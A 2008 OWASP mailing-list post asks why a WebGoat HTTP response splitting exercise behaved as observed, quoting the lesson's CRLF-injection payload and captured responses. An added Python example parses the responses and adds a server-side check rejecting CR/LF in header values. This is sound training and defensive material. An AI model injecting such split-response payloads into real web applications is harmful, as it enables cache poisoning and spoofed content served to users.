[Owasp-cincinnati] WebGoat HTTP Splitting Attack Question
Zhou, Yan
yzhou at medplus.com
Fri Jul 18 09:46:52 EDT 2008
Hi there,
Although I successfully completed HTTP Splitting Attack in WebGoat 5.2,
I did not understand the step-by-step behavior of the attack. I am using
WebScarab to capture all requests & responses to give me a better idea.
For example, what does the browser do with the 2nd "made-up" response?
Here is what I did for testing.
First, I put in the query parameter exactly as is given in the hint:
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK
%0d%0aContent- .........
This is the response I got from server below:
HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location:
http://localhost/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&langu
age=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%
20OK%0d%0aLast-Modified:%20Wed,%2016%20Jul%202018%2012:55:46%20GMT%0d%0a
Content-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Ins
ert undesireable content here</html>
Content-Type: text/html;charset=ISO-8859-1
Content-length: 0
Date: Wed, 16 Jul 2008 13:47:47 GMT
Notice that the response does not appear to be split; the 2nd injected
response is still part of the query parameter, as shown in the "Location"
header. Is this a display issue or am I missing something?
The browser then generates the next GET request; everything I injected
is now part of the GET parameters (if the response were split, I would not see
the injected content as part of the query parameter, right?)
GET
http://localhost:80/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&la
nguage=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%202
00%2
<http://localhost/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&lang
uage=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200
%252> ...........
Then, the response from the server: the server should respond to the above
GET request, right? But here is what I see; notice that it is DIFFERENT
from what I injected because of the additional headers.
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Content-Type: text/html
X-Transfer-Encoding: chunked
Date: Fri, 18 Jul 2008 13:28:52 GMT
Content-length: 45
<html>Insert undesireable content here</html>
My questions are:
1. I would hope to see two responses, split in the middle like
this. I do not know if this is just a matter of display (since the
attack was successful):
HTTP/1.1 200 OK
...
Set-Cookie: author=Wiley Hacker
HTTP/1.1 200 OK
...
2. Why isn't there a response to the 2nd GET request, but a similar
response to my injected text?
Thanks,
Yan Zhou
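An added example (not part of the post, and not WebGoat's or WebScarab's code) that reproduces the observation in the captures above: the Location header still carries %0d%0a percent-encoded, so on the wire the 302 is a single response, and a client-style splitter only finds a second response if the server decodes the parameter before echoing it. The redirect URL, body and lengths are constructed; the check at the end is the server-side mitigation.

```python
from urllib.parse import unquote

# Constructed payload in the shape of the lesson hint: percent-encoded CRLFs,
# a terminating empty response, then a second "made-up" 200 response.
ENCODED = ("foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"
           "HTTP/1.1%20200%20OK%0d%0aContent-Length:%2021%0d%0a%0d%0a"
           "<html>injected</html>")

def reflected_value(decode_before_echo: bool) -> str:
    # What ends up in Location: verbatim (as in the capture above) or decoded
    # first (hypothetical vulnerable behaviour that really splits the stream).
    return unquote(ENCODED) if decode_before_echo else ENCODED

def build_redirect(language_param: str) -> bytes:
    # Constructed stand-in for the 302 in the post: the parameter is copied
    # into the Location header without further encoding (assumption).
    location = "http://localhost/WebGoat/attack?Screen=2&language=" + language_param
    return ("HTTP/1.1 302 Moved Temporarily\r\nLocation: " + location +
            "\r\nContent-Length: 0\r\n\r\n").encode("latin-1")

def split_http_responses(raw: bytes) -> list:
    # Walk the byte stream the way a client would: status line, headers,
    # Content-Length bytes of body, repeat. One entry per response found.
    responses, pos = [], 0
    while pos < len(raw):
        head_end = raw.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break
        status, *lines = raw[pos:head_end].decode("latin-1").split("\r\n")
        if not status.startswith("HTTP/"):
            break
        headers = {}
        for line in lines:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = head_end + 4
        length = int(headers.get("content-length", "0"))
        responses.append((status, headers, raw[body_start:body_start + length]))
        pos = body_start + length
    return responses

def responses_for(decode_before_echo: bool) -> list:
    return split_http_responses(build_redirect(reflected_value(decode_before_echo)))

def is_safe_header_value(value: str) -> bool:
    # Server-side check: anything reflected into a header must carry no raw
    # CR/LF. Reject rather than strip, so encoded forms stay one response.
    return "\r" not in value and "\n" not in value

if __name__ == "__main__":
    print(len(responses_for(False)), "response(s) with the value left encoded")
    print(len(responses_for(True)), "response(s) once the server decodes it")
```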